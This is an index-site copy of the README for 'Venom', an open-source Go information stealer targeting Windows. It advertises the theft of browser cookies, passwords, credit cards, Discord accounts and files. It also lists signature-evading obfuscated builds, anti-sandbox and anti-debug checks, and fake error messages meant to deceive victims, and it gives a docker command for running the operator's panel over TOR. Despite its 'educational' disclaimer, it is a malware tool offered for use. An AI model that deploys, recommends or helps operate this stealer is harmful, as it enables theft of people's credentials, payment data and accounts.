An open API service indexing awesome lists of open source software.

https://github.com/ngn13/venom

Free and open source information stealer written in Go
https://github.com/ngn13/venom

golang-malware info-stealer information-stealer malware malware-development stealer

Last synced: 3 months ago
JSON representation

Free and open source information stealer written in Go

Awesome Lists containing this project

README

          

# Venom | Free and open source info-stealer
Venom is a free (as in freedom) and open source information stealer
tool targeting x64 Windows 10/11 systems, written in Go.

> [!CAUTION]
> This software is designed and shared only for educational and
> research purposes. It's is provided without warranty and the
> distribution platform or the developers of the software are not
> responsible for any material, moral or legal damage that may occur
> due to incorrect or unethical use of the software.

---

## πŸ“Έ Screenshots
| **Page:** home | **Page:** data | **Page:** build |
| ----------------------------------------------- | ------------------------------------------- | -------------------------------------------- |
| ![](assets/home.png) ![](assets/connection.png) | ![](assets/data.png) ![](assets/cookie.png) | ![](assets/build.png) ![](assets/builds.png) |

## πŸ—ƒοΈ Features
- Easy setup with Docker
- Web interface over TOR
- Compile time obfuscated builds for unique signatures
- Anti-VM (Anti-Sandbox) and Anti-Debug features for protection
- Steal browser information (cookies, history data, passwords and credit cards) from popular Chromium-based browsers
- Steal discord account information from popular Chromium-based browsers and the Discord app
- Steal files from the disk
- Display fake error message to trick the user
- Fairly small build sizes (~4MB)
- Multi-language support
* πŸ‡¬πŸ‡§ English
* πŸ‡ΉπŸ‡· Turkish
* πŸ‡ΈπŸ‡¦ Arabic (thanks to [R3dbust3R](https://github.com/R3dbust3R))

## πŸš€ Setup
For a minimal setup, the server requirements are:
- At least 512MB memory
- At least a single core CPU
- Docker, you can install it with your distro's package manager

The docker image is a quite big one (~1GB) so this command may take a while:
```bash
docker run -d -p 80:8082 \
-e VENOM_ALLINT=true \
-e VENOM_URL=http:// \
-v $PWD/db:/venom/server/db \
-v $PWD/tor:/var/lib/tor/venom \
ghcr.io/ngn13/venom:latest
```
Then checkout the logs for the server (`docker logs `) to learn the onion
address, so you can access the interface over TOR. Please check out the [docs](docs/advanced.md)
for a more advanced setup.

If you are having any problems then [create an issue](https://github.com/ngn13/ezcat/issues/new).

## ❀️ Contribute
If like this project, then please consider contributing! You can do so by
adding new features, fixing bugs, [adding translations](docs/translate.md) or by
just leaving a star!